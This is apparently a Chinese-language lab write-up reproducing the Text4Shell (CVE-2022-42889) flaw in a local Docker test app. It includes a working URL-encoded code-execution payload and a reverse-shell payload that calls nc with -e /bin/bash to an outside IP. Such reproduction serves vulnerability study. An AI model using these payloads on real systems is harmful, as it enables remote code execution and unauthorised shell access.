前言
Text4shell 漏洞于 2022 年 10 月 13 日向 Apache 披露。Text4Shell 是一个影响使用 Apache Commons Text Library 某些功能的 Java 产品的漏洞,它可能允许远程攻击者在服务器上执行任意代码
一、漏洞复现
1、环境搭建
漏洞利用前提条件:
1)JDK版本11.0以上;
2)Docker;
3)Maven
安装JDK,命令:sudo apt install openjdk-11-jdk
安装docker
新建文件夹 maven,安装maven
命令:wget https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
从 github 拉取PoC,命令:git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
进入PoC文件夹后使用mvn clean install(请注意如果嫌麻烦可以设置环境变量)
注:我的 maven 安装路径在家目录下
命令:…/…/maven/apache-maven-3.6.3/bin/mvn clean install
当返回BUILD SUCCESS时, 代表可以进行下一步
docker拉取镜像,命令:sudo docker build --tag=text4shell .
ps:注意后面是有一个点
启动docker测试,命令:sudo docker run -p 80:8080 text4shell
访问 http://localhost/test4shell/attack?search=ubontu
结果报错,提示类型不对
抓包修改一下,如下图就是启动成功了
2、漏洞检测
构造payload:${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch /tmp/foo’)}
编码后,即访问
/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
结果如下图所示
在虚拟机 docker 中验证结果
获取容器ID,命令:sudo docker container ls
进入容器查看我们刚刚新建的文件foo,命令:sudo docker exec -it <CONTAINER_ID> bash,也就是 sudo docker exec -it 488649bfe65f bash
也可以利用该漏洞反弹shell
构造poc:/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nc%20192.168.184.14%205555%20-e%20%2Fbin%2Fbash%27%29%7D
但是不知道为什么反弹失败,蹲一个大佬教教我